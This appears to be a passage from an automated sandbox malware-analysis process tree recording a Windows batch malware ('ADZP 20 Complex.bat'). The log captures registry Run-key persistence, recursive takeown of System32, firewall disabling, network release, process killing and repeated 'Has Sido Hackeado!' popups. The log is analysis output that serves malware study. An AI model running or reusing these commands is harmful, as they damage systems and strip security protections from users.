reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1764

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1608

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:924

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
PID:1868

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Views/modifies file attributes
PID:1632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5804

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5756

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5904

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3120

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:648

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2668

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4788

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1280

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1820

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:6180

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:6296

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:6528

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:8120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:7412

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:8748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:8764

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:8484

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:8820

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9108

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:4924

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:9812

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:10112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10060

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:5232

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:3212

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9956

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:10812

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11032

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11216

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:6928

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:6880

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:11228

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:9436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:10488

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:10608

C:\Windows\system32\calc.exe
calc
4⤵
PID:7060

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:8568

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:10736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:9192

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:6980

C:\Windows\system32\calc.exe
calc
4⤵
PID:1520

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:5044

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:7240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:11188

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:7260

C:\Windows\system32\calc.exe
calc
4⤵
PID:7256

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:4836

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:3652

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9276

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11756

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:12036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:7480

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6940

C:\Windows\system32\calc.exe
calc
3⤵
PID:7016

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6284

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:7748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:7756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:7792

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:7528

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:7936

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6996

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:1780

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:7984

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:7288

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:8232

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9128

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:9324

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:9612

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9824

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:10120

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10220

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:9476

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:4628

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:9944

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:10188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:7308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:12096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2420

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:9220

C:\Windows\system32\calc.exe
calc
4⤵
PID:1748

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:9552

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:9628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:3752

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:9684

C:\Windows\system32\calc.exe
calc
4⤵
PID:9436

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:4448

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:6120

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:5600

C:\Windows\system32\calc.exe
calc
4⤵
PID:3776

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:4464

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:3252

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:1184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:10300

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10648

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:10952

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11164

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:4204

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7216

C:\Windows\system32\calc.exe
calc
3⤵
PID:7288

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7476

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:7960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:8284

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:8564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:8968

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:8936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:8776

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:9720

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9740

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:10004

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:10152

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:2344

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:7668

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11400

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11700

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:12256

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:8156

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11988

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:7060

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:8260

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10472

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:8940

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12304

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12680

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:12948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:13124

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:13256

C:\Windows\system32\calc.exe
calc
4⤵
PID:12556

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:12824

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:5280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:10024

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:13108

C:\Windows\system32\calc.exe
calc
4⤵
PID:6548

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:5644

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:10996

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7988

C:\Windows\system32\calc.exe
calc
3⤵
PID:6864

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3256

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7516

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:7552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:7644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:7652

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:6044

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:8496

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:8644

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:4744

C:\Windows\system32\calc.exe
calc
2⤵
- Modifies registry class
PID:468

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies registry class
PID:1132

C:\Windows\system32\mspaint.exe
mspaint.exe
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:2288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:1420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:5524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
PID:5736

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Modifies file permissions
PID:6084

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:5768

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:5980

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:6112

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
PID:4684

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Views/modifies file attributes
PID:4656

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5220

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:8

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1248

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3660

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:5888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5448

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4596

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:5660

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1632

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:1168

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:4992

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:6264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:9196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:3112

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
5⤵
PID:9504

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:3608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:9340

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:9580

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9804

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:10060

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:10192

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:3972

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:5580

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11852

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:12112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:8448

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:12160

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:7984

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:7080

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:10232

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:12536

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12756

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12968

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
4⤵
PID:13236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:12492

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:12776

C:\Windows\system32\calc.exe
calc
4⤵
PID:13008

C:\Windows\explorer.exe
explorer.exe
4⤵
PID:10492

C:\Windows\system32\mspaint.exe
mspaint.exe
4⤵
PID:12496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
4⤵
PID:12832

C:\Windows\system32\notepad.exe
notepad
4⤵
PID:12720

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6320

C:\Windows\system32\calc.exe
calc
3⤵
PID:6340

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6356

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:8220

C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
4⤵
- Modifies Windows Firewall
PID:8348

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:8636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:1352

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Modifies file permissions
PID:9712

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9652

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:9880

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:10084

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:3828

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
4⤵
- Views/modifies file attributes
PID:5824

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:11432

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11708

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11232

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:5976

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:8824

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
4⤵
PID:6272

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
4⤵
PID:11564

C:\Windows\system32\msg.exe
msg * Virus Detectado
4⤵
PID:12296

